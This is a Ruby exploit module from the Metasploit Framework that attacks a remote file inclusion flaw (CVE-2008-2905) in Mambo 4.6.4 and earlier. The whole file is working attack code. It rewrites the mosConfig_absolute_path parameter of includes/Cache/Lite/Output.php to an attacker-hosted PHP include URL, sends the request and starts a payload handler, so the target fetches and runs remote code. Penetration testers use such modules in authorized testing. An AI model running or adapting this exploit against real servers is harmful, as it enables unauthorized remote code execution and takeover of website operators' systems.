### $Id: mambo_cache_lite.rb 11127 2010-11-24 19:35:38Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require'msf/core'classMetasploit3<Msf::Exploit::RemoteRank=ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPIncludedefinitialize(info ={})super(update_info(info,'Name'=>'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include','Description'=>%q{
This module exploits a remote file inclusion vulnerability in
includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
4.6.4 and earlier.
},'Author'=>['MC'],'License'=>MSF_LICENSE,'Version'=>'$Revision: 11127 $','References'=>[['CVE','2008-2905'],['OSVDB','46173'],['BID','29716'],],'Privileged'=>false,'Payload'=>{'DisableNops'=>true,'Compat'=>{'ConnectionType'=>'find',},'Space'=>32768,},'Platform'=>'php','Arch'=>ARCH_PHP,'Targets'=>[['Automatic',{}]],'DisclosureDate'=>'Jun 14 2008','DefaultTarget'=>0))register_options([OptString.new('PHPURI',[true,"The URI to request, with the include parameter changed to !URL!","/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),],self.class)enddef php_exploit
timeout =0.01
uri = datastore['PHPURI'].gsub('!URL!',Rex::Text.to_hex(php_include_url,"%"))print_status("Trying uri #{uri}")
response =send_request_raw({'global'=>true,'uri'=> uri,},timeout)if response and response.code !=200print_error("Server returned non-200 status code (#{response.code})")end
handler
endend
